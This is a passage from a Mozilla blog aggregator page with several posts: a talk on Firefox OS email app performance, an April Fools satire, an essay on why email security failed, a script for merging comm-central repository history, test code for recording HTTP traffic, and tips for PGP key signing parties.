Then we have our single script file.  Because the stylesheet precedes the script, our script will not execute until the stylesheet has been loaded.  Then our script runs and we synchronously insert our HTML from local storage.  Then DOMContentLoaded can fire.  At this point the layout engine has enough information to perform a style recalculation and determine what CSS-referenced image resources need to be loaded for buttons and icons, then those load, and then we’re good to be displayed as the “load” event can fire.

After that, we’re displaying an interactive-ish HTML document.  You can scroll, you can press on buttons and the :active state will apply.  So things seem real.

Being Fast: Lazy Loading and Optimized Layers

But now we need to try and get some logic in place as quickly as possible that will actually cash the checks that real-looking HTML UI is writing.  And the key to that is only loading what you need when you need it, and trying to get it to load as quickly as possible.

There are many module loading and build optimizing tools out there, and most frameworks have a preferred or required way of handling this.  We used the RequireJS family of Asynchronous Module Definition loaders, specifically the alameda loader and the r-dot-js optimizer.

One of the niceties of the loader plugin model is that we are able to express resource dependencies as well as code dependencies.

RequireJS Loader Plugins

var fooModule = require('./foo'); var htmlString = require('text!./foo.html'); var localizedDomNode = require('tmpl!./foo.html');

The standard Common JS loader semantics used by node.js and io.js are the first one you see here.  Load the module, return its exports.

But RequireJS loader plugins also allow us to do things like the second line where the exclamation point indicates that the load should occur using a loader plugin, which is itself a module that conforms to the loader plugin contract.  In this case it’s saying load the file foo.html as raw text and return it as a string.

But, wait, there’s more!  loader plugins can do more than that.  The third example uses a loader that loads the HTML file using the ‘text’ plugin under the hood, creates an HTML document fragment, and pre-localizes it using our localization library.  And this works un-optimized in a browser, no compilation step needed, but it can also be optimized.

So when our optimizer runs, it bundles up the core modules we use, plus, the modules for our “message list” card that displays the inbox.  And the message list card loads its HTML snippets using the template loader plugin.  The r-dot-js optimizer then locates these dependencies and the loader plugins also have optimizer logic that results in the HTML strings being inlined in the resulting optimized file.  So there’s just one single javascript file to load with no extra HTML file dependencies or other loads.

We then also run the optimizer against our other important cards like the “compose” card and the “message reader” card.  We don’t do this for all cards because it can be hard to carve up the module dependency graph for optimization without starting to run into cases of overlap where many optimized files redundantly include files loaded by other optimized files.

Plus, we have another trick up our sleeve:

Seeming Fast: Preloading

Preloading.  Our cards optionally know the other cards they can load.  So once we display a card, we can kick off a preload of the cards that might potentially be displayed.  For example, the message list card can trigger the compose card and the message reader card, so we can trigger a preload of both of those.

But we don’t go overboard with preloading in the frontend because we still haven’t actually loaded the back-end that actually does all the emaily email stuff.  The back-end is also chopped up into optimized layers along account type lines and online/offline needs, but the main optimized JS file still weighs in at something like 17 thousand lines of code with newlines retained.

So once our UI logic is loaded, it’s time to kick-off loading the back-end.  And in order to avoid impacting the responsiveness of the UI both while it loads and when we’re doing steady-state processing, we run it in a DOM Worker.

Being Responsive: Workers and SharedWorkers

DOM Workers are background JS threads that lack access to the page’s DOM, communicating with their owning page via message passing with postMessage.  Normal workers are owned by a single page.  SharedWorkers can be accessed via multiple pages from the same document origin.

By doing this, we stay out of the way of the main thread.  This is getting less important as browser engines support Asynchronous Panning & Zooming or “APZ” with hardware-accelerated composition, tile-based rendering, and all that good stuff.  (Some might even call it magic.)

When Firefox OS started, we didn’t have APZ, so any main-thread logic had the serious potential to result in janky scrolling and the impossibility of rendering at 60 frames per second.  It’s a lot easier to get 60 frames-per-second now, but even asynchronous pan and zoom potentially has to wait on dispatching an event to the main thread to figure out if the user’s tap is going to be consumed by app logic and preventDefault called on it.  APZ does this because it needs to know whether it should start scrolling or not.

And speaking of 60 frames-per-second…

Being Fast: Virtual List Widgets

…the heart of a mail application is the message list.  The expected UX is to be able to fling your way through the entire list of what the email app knows about and see the messages there, just like you would on a native app.

This is admittedly one of the areas where native apps have it easier.  There are usually list widgets that explicitly have a contract that says they request data on an as-needed basis.  They potentially even include data bindings so you can just point them at a data-store.

But HTML doesn’t yet have a concept of instantiate-on-demand for the DOM, although it’s being discussed by Firefox layout engine developers.  For app purposes, the DOM is a scene graph.  An extremely capable scene graph that can handle huge documents, but there are footguns and it’s arguably better to err on the side of fewer DOM nodes.

So what the email app does is we create a scroll-region div and explicitly size it based on the number of messages in the mail folder we’re displaying.  We create and render enough message summary nodes to cover the current screen, 3 screens worth of messages in the direction we’re scrolling, and then we also retain up to 3 screens worth in the direction we scrolled from.  We also pre-fetch 2 more screens worth of messages from the database.  These constants were arrived at experimentally on prototype devices.

We listen to “scroll” events and issue database requests and move DOM nodes around and update them as the user scrolls.  For any potentially jarring or expensive transitions such as coordinate space changes from new messages being added above the current scroll position, we wait for scrolling to stop.

Nodes are absolutely positioned within the scroll area using their ‘top’ style but translation transforms also work.  We remove nodes from the DOM, then update their position and their state before re-appending them.  We do this because the browser APZ logic tries to be clever and figure out how to create an efficient series of layers so that it can pre-paint as much of the DOM as possible in graphic buffers, AKA layers, that can be efficiently composited by the GPU.  Its goal is that when the user is scrolling, or something is being animated, that it can just move the layers around the screen or adjust their opacity or other transforms without having to ask the layout engine to re-render portions of the DOM.

When our message elements are added to the DOM with an already-initialized absolute position, the APZ logic lumps them together as something it can paint in a single layer along with the other elements in the scrolling region.  But if we start moving them around while they’re still in the DOM, the layerization logic decides that they might want to independently move around more in the future and so each message item ends up in its own layer.  This slows things down.  But by removing them and re-adding them it sees them as new with static positions and decides that it can lump them all together in a single layer.  Really, we could just create new DOM nodes, but we produce slightly less garbage this way and in the event there’s a bug, it’s nicer to mess up with 30 DOM nodes displayed incorrectly rather than 3 million.

But as neat as the layerization stuff is to know about on its own, I really mention it to underscore 2 suggestions:

1, Use a library when possible.  Getting on and staying on APZ fast-paths is not trivial, especially across browser engines.  So it’s a very good idea to use a library rather than rolling your own.

2, Use developer tools.  APZ is tricky to reason about and even the developers who write the Async pan & zoom logic can be surprised by what happens in complex real-world situations.  And there ARE developer tools available that help you avoid needing to reason about this.  Firefox OS has easy on-device developer tools that can help diagnose what’s going on or at least help tell you whether you’re making things faster or slower:

– it’s got a frames-per-second overlay; you do need to scroll like mad to get the system to want to render 60 frames-per-second, but it makes it clear what the net result is

– it has paint flashing that overlays random colors every time it paints the DOM into a layer.  If the screen is flashing like a discotheque or has a lot of smeared rainbows, you know something’s wrong because the APZ logic is not able to to just reuse its layers.

– devtools can enable drawing cool colored borders around the layers APZ has created so you can see if layerization is doing something crazy

There’s also fancier and more complicated tools in Firefox and other browsers like Google Chrome to let you see what got painted, what the layer tree looks like, et cetera.

And that’s my spiel.

Links

The source code to Gaia can be found at https://github.com/mozilla-b2g/gaia

The email app in particular can be found at https://github.com/mozilla-b2g/gaia/tree/master/apps/email

(I also asked for questions here.)

Categorieën: Mozilla-nl planet

Joshua Cranmer: Breaking news

Thunderbird - wo, 01/04/2015 - 09:00
It was brought to my attention recently by reputable sources that the recent announcement of increased usage in recent years produced an internal firestorm within Mozilla. Key figures raised alarm that some of the tech press had interpreted the blog post as a sign that Thunderbird was not, in fact, dead. As a result, they asked Thunderbird community members to make corrections to emphasize that Mozilla was trying to kill Thunderbird.

The primary fear, it seems, is that knowledge that the largest open-source email client was still receiving regular updates would impel its userbase to agitate for increased funding and maintenance of the client to help forestall potential threats to the open nature of email as well as to innovate in the space of providing usable and private communication channels. Such funding, however, would be an unaffordable luxury and would only distract Mozilla from its central goal of building developer productivity tooling. Persistent rumors that Mozilla would be willing to fund Thunderbird were it renamed Firefox Email were finally addressed with the comment, "such a renaming would violate our current policy that all projects be named Persona."

Categorieën: Mozilla-nl planet

Joshua Cranmer: Why email is hard, part 8: why email security failed

Thunderbird - di, 13/01/2015 - 05:38
This post is part 8 of an intermittent series exploring the difficulties of writing an email client. Part 1 describes a brief history of the infrastructure. Part 2 discusses internationalization. Part 3 discusses MIME. Part 4 discusses email addresses. Part 5 discusses the more general problem of email headers. Part 6 discusses how email security works in practice. Part 7 discusses the problem of trust. This part discusses why email security has largely failed.

At the end of the last part in this series, I posed the question, "Which email security protocol is most popular?" The answer to the question is actually neither S/MIME nor PGP, but a third protocol, DKIM. I haven't brought up DKIM until now because DKIM doesn't try to secure email in the same vein as S/MIME or PGP, but I still consider it relevant to discussing email security.

Unquestionably, DKIM is the only security protocol for email that can be considered successful. There are perhaps 4 billion active email addresses [1]. Of these, about 1-2 billion use DKIM. In contrast, S/MIME can count a few million users, and PGP at best a few hundred thousand. No other security protocols have really caught on past these three. Why did DKIM succeed where the others fail?

DKIM's success stems from its relatively narrow focus. It is nothing more than a cryptographic signature of the message body and a smattering of headers, and is itself stuck in the DKIM-Signature header. It is meant to be applied to messages only on outgoing servers and read and processed at the recipient mail server—it completely bypasses clients. That it bypasses clients allows it to solve the problem of key discovery and key management very easily (public keys are stored in DNS, which is already a key part of mail delivery), and its role in spam filtering is strong motivation to get it implemented quickly (it is 7 years old as of this writing). It's also simple: this one paragraph description is basically all you need to know [2].

The failure of S/MIME and PGP to see large deployment is certainly a large topic of discussion on myriads of cryptography enthusiast mailing lists, which often like to partake in propositions of new end-to-end encryption of email paradigms, such as the recent DIME proposal. Quite frankly, all of these solutions suffer broadly from at least the same 5 fundamental weaknesses, and I see it unlikely that a protocol will come about that can fix these weaknesses well enough to become successful.

The first weakness, and one I've harped about many times already, is UI. Most email security UI is abysmal and generally at best usable only by enthusiasts. At least some of this is endemic to security: while it mean seem obvious how to convey what an email signature or an encrypted email signifies, how do you convey the distinctions between sign-and-encrypt, encrypt-and-sign, or an S/MIME triple wrap? The Web of Trust model used by PGP (and many other proposals) is even worse, in that inherently requires users to do other actions out-of-band of email to work properly.

Trust is the second weakness. Consider that, for all intents and purposes, the email address is the unique identifier on the Internet. By extension, that implies that a lot of services are ultimately predicated on the notion that the ability to receive and respond to an email is a sufficient means to identify an individual. However, the entire purpose of secure email, or at least of end-to-end encryption, is subtly based on the fact that other people in fact have access to your mailbox, thus destroying the most natural ways to build trust models on the Internet. The quest for anonymity or privacy also renders untenable many other plausible ways to establish trust (e.g., phone verification or government-issued ID cards).

Key discovery is another weakness, although it's arguably the easiest one to solve. If you try to keep discovery independent of trust, the problem of key discovery is merely picking a protocol to publish and another one to find keys. Some of these already exist: PGP key servers, for example, or using DANE to publish S/MIME or PGP keys.

Key management, on the other hand, is a more troubling weakness. S/MIME, for example, basically works without issue if you have a certificate, but managing to get an S/MIME certificate is a daunting task (necessitated, in part, by its trust model—see how these issues all intertwine?). This is also where it's easy to say that webmail is an unsolvable problem, but on further reflection, I'm not sure I agree with that statement anymore. One solution is just storing the private key with the webmail provider (you're trusting them as an email client, after all), but it's also not impossible to imagine using phones or flash drives as keystores. Other key management factors are more difficult to solve: people who lose their private keys or key rollover create thorny issues. There is also the difficulty of managing user expectations: if I forget my password to most sites (even my email provider), I can usually get it reset somehow, but when a private key is lost, the user is totally and completely out of luck.

Of course, there is one glaring and almost completely insurmountable problem. Encrypted email fundamentally precludes certain features that we have come to take for granted. The lesser known is server-side search and filtration. While there exist some mechanisms to do search on encrypted text, those mechanisms rely on the fact that you can manipulate the text to change the message, destroying the integrity feature of secure email. They also tend to be fairly expensive. It's easy to just say "who needs server-side stuff?", but the contingent of people who do email on smartphones would not be happy to have to pay the transfer rates to download all the messages in their folder just to find one little email, nor the energy costs of doing it on the phone. And those who have really large folders—Fastmail has a design point of 1,000,000 in a single folder—would still prefer to not have to transfer all their mail even on desktops.

The more well-known feature that would disappear is spam filtration. Consider that 90% of all email is spam, and if you think your spam folder is too slim for that to be true, it's because your spam folder only contains messages that your email provider wasn't sure were spam. The loss of server-side spam filtering would dramatically increase the cost of spam (a 10% reduction in efficiency would double the amount of server storage, per my calculations), and client-side spam filtering is quite literally too slow [3] and too costly (remember smartphones? Imagine having your email take 10 times as much energy and bandwidth) to be a tenable option. And privacy or anonymity tends to be an invitation to abuse (cf. Tor and Wikipedia). Proposed solutions to the spam problem are so common that there is a checklist containing most of the objections.

When you consider all of those weaknesses, it is easy to be pessimistic about the possibility of wide deployment of powerful email security solutions. The strongest future—all email is encrypted, including metadata—is probably impossible or at least woefully impractical. That said, if you weaken some of the assumptions (say, don't desire all or most traffic to be encrypted), then solutions seem possible if difficult.

This concludes my discussion of email security, at least until things change for the better. I don't have a topic for the next part in this series picked out (this part actually concludes the set I knew I wanted to discuss when I started), although OAuth and DMARC are two topics that have been bugging me enough recently to consider writing about. They also have the unfortunate side effect of being things likely to see changes in the near future, unlike most of the topics I've discussed so far. But rest assured that I will find more difficulties in the email infrastructure to write about before long!

[1] All of these numbers are crude estimates and are accurate to only an order of magnitude. To justify my choices: I assume 1 email address per Internet user (this overestimates the developing world and underestimates the developed world). The largest webmail providers have given numbers that claim to be 1 billion active accounts between them, and all of them use DKIM. S/MIME is guessed by assuming that any smartcard deployment supports S/MIME, and noting that the US Department of Defense and Estonia's digital ID project are both heavy users of such smartcards. PGP is estimated from the size of the strong set and old numbers on the reachable set from the core Web of Trust.
[2] Ever since last April, it's become impossible to mention DKIM without referring to DMARC, as a result of Yahoo's controversial DMARC policy. A proper discussion of DMARC (and why what Yahoo did was controversial) requires explaining the mail transmission architecture and spam, however, so I'll defer that to a later post. It's also possible that changes in this space could happen within the next year.
[3] According to a former GMail spam employee, if it takes you as long as three minutes to calculate reputation, the spammer wins.

Categorieën: Mozilla-nl planet

Joshua Cranmer: A unified history for comm-central

Thunderbird - za, 10/01/2015 - 18:55
Several years back, Ehsan and Jeff Muizelaar attempted to build a unified history of mozilla-central across the Mercurial era and the CVS era. Their result is now used in the gecko-dev repository. While being distracted on yet another side project, I thought that I might want to do the same for comm-central. It turns out that building a unified history for comm-central makes mozilla-central look easy: mozilla-central merely had one import from CVS. In contrast, comm-central imported twice from CVS (the calendar code came later), four times from mozilla-central (once with converted history), and imported twice from Instantbird's repository (once with converted history). Three of those conversions also involved moving paths. But I've worked through all of those issues to provide a nice snapshot of the repository [1]. And since I've been frustrated by failing to find good documentation on how this sort of process went for mozilla-central, I'll provide details on the process for comm-central.

The first step and probably the hardest is getting the CVS history in DVCS form (I use hg because I'm more comfortable it, but there's effectively no difference between hg, git, or bzr here). There is a git version of mozilla's CVS tree available, but I've noticed after doing research that its last revision is about a month before the revision I need for Calendar's import. The documentation for how that repo was built is no longer on the web, although we eventually found a copy after I wrote this post on git.mozilla.org. I tried doing another conversion using hg convert to get CVS tags, but that rudely blew up in my face. For now, I've filed a bug on getting an official, branchy-and-tag-filled version of this repository, while using the current lack of history as a base. Calendar people will have to suffer missing a month of history.

CVS is famously hard to convert to more modern repositories, and, as I've done my research, Mozilla's CVS looks like it uses those features which make it difficult. In particular, both the calendar CVS import and the comm-central initial CVS import used a CVS tag HG_COMM_INITIAL_IMPORT. That tagging was done, on only a small portion of the tree, twice, about two months apart. Fortunately, mailnews code was never touched on CVS trunk after the import (there appears to be one commit on calendar after the tagging), so it is probably possible to salvage a repository-wide consistent tag.

The start of my script for conversion looks like this:

#!/bin/bash set -e WORKDIR=/tmp HGCVS=$WORKDIR/mozilla-cvs-history MC=/src/trunk/mozilla-central CC=/src/trunk/comm-central OUTPUT=$WORKDIR/full-c-c # Bug 445146: m-c/editor/ui -> c-c/editor/ui MC_EDITOR_IMPORT=d8064eff0a17372c50014ee305271af8e577a204 # Bug 669040: m-c/db/mork -> c-c/db/mork MC_MORK_IMPORT=f2a50910befcf29eaa1a29dc088a8a33e64a609a # Bug 1027241, bug 611752 m-c/security/manager/ssl/** -> c-c/mailnews/mime/src/* MC_SMIME_IMPORT=e74c19c18f01a5340e00ecfbc44c774c9a71d11d # Step 0: Grab the mozilla CVS history. if [ ! -e $HGCVS ]; then hg clone git+https://github.com/jrmuizel/mozilla-cvs-history.git $HGCVS fi

Since I don't want to include the changesets useless to comm-central history, I trimmed the history by using hg convert to eliminate changesets that don't change the necessary files. Most of the files are simple directory-wide changes, but S/MIME only moved a few files over, so it requires a more complex way to grab the file list. In addition, I also replaced the % in the usernames with @ that they are used to appearing in hg. The relevant code is here:

# Step 1: Trim mozilla CVS history to include only the files we are ultimately # interested in. cat >$WORKDIR/convert-filemap.txt <<EOF # Revision e4f4569d451a include directory/xpcom include mail include mailnews include other-licenses/branding/thunderbird include suite # Revision 7c0bfdcda673 include calendar include other-licenses/branding/sunbird # Revision ee719a0502491fc663bda942dcfc52c0825938d3 include editor/ui # Revision 52efa9789800829c6f0ee6a005f83ed45a250396 include db/mork/ include db/mdb/ EOF # Add the S/MIME import files hg -R $MC log -r "children($MC_SMIME_IMPORT)" \ --template "{file_dels % 'include {file}\n'}" >>$WORKDIR/convert-filemap.txt if [ ! -e $WORKDIR/convert-authormap.txt ]; then hg -R $HGCVS log --template "{email(author)}={sub('%', '@', email(author))}\n" \ | sort -u > $WORKDIR/convert-authormap.txt fi cd $WORKDIR hg convert $HGCVS $OUTPUT --filemap convert-filemap.txt -A convert-authormap.txt

That last command provides us the subset of the CVS history that we need for unified history. Strictly speaking, I should be pulling a specific revision, but I happen to know that there's no need to (we're cloning the only head) in this case. At this point, we now need to pull in the mozilla-central changes before we pull in comm-central. Order is key; hg convert will only apply the graft points when converting the child changeset (which it does but once), and it needs the parents to exist before it can do that. We also need to ensure that the mozilla-central graft point is included before continuing, so we do that, and then pull mozilla-central:

CC_CVS_BASE=$(hg log -R $HGCVS -r 'tip' --template '{node}') CC_CVS_BASE=$(grep $CC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2) MC_CVS_BASE=$(hg log -R $HGCVS -r 'gitnode(215f52d06f4260fdcca797eebd78266524ea3d2c)' --template '{node}') MC_CVS_BASE=$(grep $MC_CVS_BASE $OUTPUT/.hg/shamap | cut -d' ' -f2) # Okay, now we need to build the map of revisions. cat >$WORKDIR/convert-revmap.txt <<EOF e4f4569d451a5e0d12a6aa33ebd916f979dd8faa $CC_CVS_BASE # Thunderbird / Suite 7c0bfdcda6731e77303f3c47b01736aaa93d5534 d4b728dc9da418f8d5601ed6735e9a00ac963c4e, $CC_CVS_BASE # Calendar 9b2a99adc05e53cd4010de512f50118594756650 $MC_CVS_BASE # Mozilla graft point ee719a0502491fc663bda942dcfc52c0825938d3 78b3d6c649f71eff41fe3f486c6cc4f4b899fd35, $MC_EDITOR_IMPORT # Editor 8cdfed92867f885fda98664395236b7829947a1d 4b5da7e5d0680c6617ec743109e6efc88ca413da, e4e612fcae9d0e5181a5543ed17f705a83a3de71 # Chat EOF # Next, import mozilla-central revisions for rev in $MC_MORK_IMPORT $MC_EDITOR_IMPORT $MC_SMIME_IMPORT; do hg convert $MC $OUTPUT -r $rev --splicemap $WORKDIR/convert-revmap.txt \ --filemap $WORKDIR/convert-filemap.txt done

Some notes about all of the revision ids in the script. The splicemap requires the full 40-character SHA ids; anything less and the thing complains. I also need to specify the parents of the revisions that deleted the code for the mozilla-central import, so if you go hunting for those revisions and are surprised that they don't remove the code in question, that's why.

I mentioned complications about the merges earlier. The Mork and S/MIME import codes here moved files, so that what was db/mdb in mozilla-central became db/mork. There's no support for causing the generated splice to record these as a move, so I have to manually construct those renamings:

# We need to execute a few hg move commands due to renamings. pushd $OUTPUT hg update -r $(grep $MC_MORK_IMPORT .hg/shamap | cut -d' ' -f2) (hg -R $MC log -r "children($MC_MORK_IMPORT)" \ --template "{file_dels % 'hg mv {file} {sub(\"db/mdb\", \"db/mork\", file)}\n'}") | bash hg commit -m 'Pseudo-changeset to move Mork files' -d '2011-08-06 17:25:21 +0200' MC_MORK_IMPORT=$(hg log -r tip --template '{node}') hg update -r $(grep $MC_SMIME_IMPORT .hg/shamap | cut -d' ' -f2) (hg -R $MC log -r "children($MC_SMIME_IMPORT)" \ --template "{file_dels % 'hg mv {file} {sub(\"security/manager/ssl\", \"mailnews/mime\", file)}\n'}") | bash hg commit -m 'Pseudo-changeset to move S/MIME files' -d '2014-06-15 20:51:51 -0700' MC_SMIME_IMPORT=$(hg log -r tip --template '{node}') popd # Echo the new move commands to the changeset conversion map. cat >>$WORKDIR/convert-revmap.txt <<EOF 52efa9789800829c6f0ee6a005f83ed45a250396 abfd23d7c5042bc87502506c9f34c965fb9a09d1, $MC_MORK_IMPORT # Mork 50f5b5fc3f53c680dba4f237856e530e2097adfd 97253b3cca68f1c287eb5729647ba6f9a5dab08a, $MC_SMIME_IMPORT # S/MIME EOF

Now that we have all of the graft points defined, and all of the external code ready, we can pull comm-central and do the conversion. That's not quite it, though—when we graft the S/MIME history to the original mozilla-central history, we have a small segment of abandoned converted history. A call to hg strip removes that.

# Now, import comm-central revisions that we need hg convert $CC $OUTPUT --splicemap $WORKDIR/convert-revmap.txt hg strip 2f69e0a3a05a

[1] I left out one of the graft points because I just didn't want to deal with it. I'll leave it as an exercise to the reader to figure out which one it was. Hint: it's the only one I didn't know about before I searched for the archive points [2].
[2] Since I wasn't sure I knew all of the graft points, I decided to try to comb through all of the changesets to figure out who imported code. It turns out that hg log -r 'adds("**")' narrows it down nicely (1667 changesets to look at instead of 17547), and using the {file_adds} template helps winnow it down more easily.

Categorieën: Mozilla-nl planet

Philipp Kewisch: Monitor all http(s) network requests using the Mozilla Platform

Thunderbird - do, 02/10/2014 - 16:38

In an xpcshell test, I recently needed a way to monitor all network requests and access both request and response data so I can save them for later use. This required a little bit of digging in Mozilla’s devtools code so I thought I’d write a short blog post about it.

This code will be used in a testcase that ensures that calendar providers in Lightning function properly. In the case of the CalDAV provider, we would need to access a real server for testing. We can’t just set up a few servers and use them for testing, it would end in an unreasonable amount of server maintenance. Given non-local connections are not allowed when running the tests on the Mozilla build infrastructure, it wouldn’t work anyway. The solution is to create a fakeserver, that is able to replay the requests in the same way. Instead of manually making the requests and figuring out how the server replies, we can use this code to quickly collect all the requests we need.

Without further delay, here is the code you have been waiting for:

/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ var allRequests = []; /** * Add the following function as a request observer: * Services.obs.addObserver(httpObserver, "http-on-examine-response", false); * * When done listening on requests: * dump(allRequests.join("\n===\n")); // print them * dump(JSON.stringify(allRequests, null, " ")) // jsonify them */ function httpObserver(aSubject, aTopic, aData) { if (aSubject instanceof Components.interfaces.nsITraceableChannel) { let request = new TracedRequest(aSubject); request._next = aSubject.setNewListener(request); allRequests.push(request); } } /** * This is the object that represents a request/response and also collects the data for it * * @param aSubject The channel from the response observer. */ function TracedRequest(aSubject) { let httpchannel = aSubject.QueryInterface(Components.interfaces.nsIHttpChannel); let self = this; this.requestHeaders = Object.create(null); httpchannel.visitRequestHeaders({ visitHeader: function(k, v) { self.requestHeaders[k] = v; } }); this.responseHeaders = Object.create(null); httpchannel.visitResponseHeaders({ visitHeader: function(k, v) { self.responseHeaders[k] = v; } }); this.uri = aSubject.URI.spec; this.method = httpchannel.requestMethod; this.requestBody = readRequestBody(aSubject); this.responseStatus = httpchannel.responseStatus; this.responseStatusText = httpchannel.responseStatusText; this._chunks = []; } TracedRequest.prototype = { uri: null, method: null, requestBody: null, requestHeaders: null, responseStatus: null, responseStatusText: null, responseHeaders: null, responseBody: null, toJSON: function() { let j = Object.create(null); for (let m of Object.keys(this)) { if (typeof this[m] != "function" && m[0] != "_") { j[m] = this[m]; } } return j; }, onStartRequest: function(aRequest, aContext) this._next.onStartRequest(aRequest, aContext), onStopRequest: function(aRequest, aContext, aStatusCode) { this.responseBody = this._chunks.join(""); this._chunks = null; this._next.onStopRequest(aRequest, aContext, aStatusCode); this._next = null; }, onDataAvailable: function(aRequest, aContext, aStream, aOffset, aCount) { let binaryInputStream = Components.classes["@mozilla.org/binaryinputstream;1"] .createInstance(Components.interfaces.nsIBinaryInputStream); let storageStream = Components.classes["@mozilla.org/storagestream;1"] .createInstance(Components.interfaces.nsIStorageStream); let outStream = Components.classes["@mozilla.org/binaryoutputstream;1"] .createInstance(Components.interfaces.nsIBinaryOutputStream); binaryInputStream.setInputStream(aStream); storageStream.init(8192, aCount, null); outStream.setOutputStream(storageStream.getOutputStream(0)); let data = binaryInputStream.readBytes(aCount); this._chunks.push(data); outStream.writeBytes(data, aCount); this._next.onDataAvailable(aRequest, aContext, storageStream.newInputStream(0), aOffset, aCount); }, toString: function() { let str = this.method + " " + this.uri; for (let hdr of Object.keys(this.requestHeaders)) { str += hdr + ": " + this.requestHeaders[hdr] + "\n"; } if (this.requestBody) { str += "\r\n" + this.requestBody + "\n"; } str += "\n" + this.responseStatus + " " + this.responseStatusText if (this.responseBody) { str += "\r\n" + this.responseBody + "\n"; } return str; } }; // Taken from: // http://hg.mozilla.org/mozilla-central/file/2399d1ae89e9/toolkit/devtools/webconsole/network-helper.js#l120 function readRequestBody(aRequest, aCharset="UTF-8") { let text = null; if (aRequest instanceof Ci.nsIUploadChannel) { let iStream = aRequest.uploadStream; let isSeekableStream = false; if (iStream instanceof Ci.nsISeekableStream) { isSeekableStream = true; } let prevOffset; if (isSeekableStream) { prevOffset = iStream.tell(); iStream.seek(Ci.nsISeekableStream.NS_SEEK_SET, 0); } // Read data from the stream. try { let rawtext = NetUtil.readInputStreamToString(iStream, iStream.available()) let conv = Components.classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); conv.charset = aCharset; text = conv.ConvertToUnicode(rawtext); } catch (err) { } // Seek locks the file, so seek to the beginning only if necko hasn't // read it yet, since necko doesn't eek to 0 before reading (at lest // not till 459384 is fixed). if (isSeekableStream && prevOffset == 0) { iStream.seek(Components.interfaces.nsISeekableStream.NS_SEEK_SET, 0); } } return text; }

view raw
TracedRequest.js
hosted with ❤ by GitHub

Categorieën: Mozilla-nl planet

Ludovic Hirlimann: Tips on organizing a pgp key signing party

Thunderbird - ma, 29/09/2014 - 13:03

Over the years I’ve organized or tried to organize pgp key signing parties every time I go somewhere. I the last year I’ve organized 3 that were successful (eg with more then 10 attendees).

1. Have a venue

I’ve tried a bunch of times to have people show up at the hotel I was staying in the morning - that doesn’t work. Having catering at the venues is even better, it will encourage people to come from far away (or long distance commute). Try to show the path in the venues with signs (paper with PGP key signing party and arrows help).

2. Date and time

Meeting in the evening after work works better ( after 18 or 18:30 works better).

Let people know how long it will take (count 1 hour/per 30 participants).

3. Make people sign up

That makes people think twice before saying they will attend. It’s also an easy way for you to know how much beer/cola/ etc.. you’ll need to provide if you cater food.

I’ve been using eventbrite to manage attendance at my last three meeting it let’s me :

  • know who is coming
  • Mass mail participants
  • have them have a calendar reminder
4 Reach out

For such a party you need people to attend so you need to reach out.

I always start by a search on biglumber.com to find who are the people using gpg registered on that site for the area I’m visiting (see below on what I send).

Then I look for local linux users groups / *BSD groups  and send an announcement to them with :

  • date
  • venue
  • link to eventbrite and why I use it
  • ask them to forward (they know the area better than you)
  • I also use lanyrd and twitter but I’m not convinced that it works.

for my last announcement it looked like this :

Subject: GnuPG / PGP key signing party September 26 2014 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="t01Mpe56TgLc7mgHKVMajjwkqQdw8XvI4" This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --t01Mpe56TgLc7mgHKVMajjwkqQdw8XvI4 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Hello my name is ludovic, I'm a sysadmins at mozilla working remote from europe. I've been involved with Thunderbird a lot (and still am). I'm organizing a pgp Key signing party in the Mozilla san francisco office on September the 26th 2014 from 6PM to 8PM. For security and assurances reasons I need to count how many people will attend. I'v setup a eventbrite for that at https://www.eventbrite.com/e/gnupg-pgp-key-signing-party-making-the-web-o= f-trust-stronger-tickets-12867542165 (please take one ticket if you think about attending - If you change you mind cancel so more people can come). I will use the eventbrite tool to send reminders and I will try to make a list with keys and fingerprint before the event to make things more manageable (but I don't promise). for those using lanyrd you will be able to use http://lanyrd.com/ccckzw. Ludovic ps sent to buug.org,nblug.org end penlug.org - please feel free to post where appropriate ( the more the meerier, the stronger the web of trust).= ps2 I have contacted people listed on biglumber to have more gpg related people show up. --=20 [:Usul] MOC Team at Mozilla QA Lead fof Thunderbird http://sietch-tabr.tumblr.com/ - http://weusepgp.info/ 5. Make it easy to attend

As noted above making a list of participants to hand out helps a lot (I’ve used http://www.phildev.net/pius/ and my own stuff to make a list). It make it easier for you, for attendees. Tell people what they need to bring (IDs, pen, printed fingerprints if you don’t provide a list).

6. Send reminders

Send people reminder and let them know how many people intend to show up. It boosts audience.

Categorieën: Mozilla-nl planet

Pagina's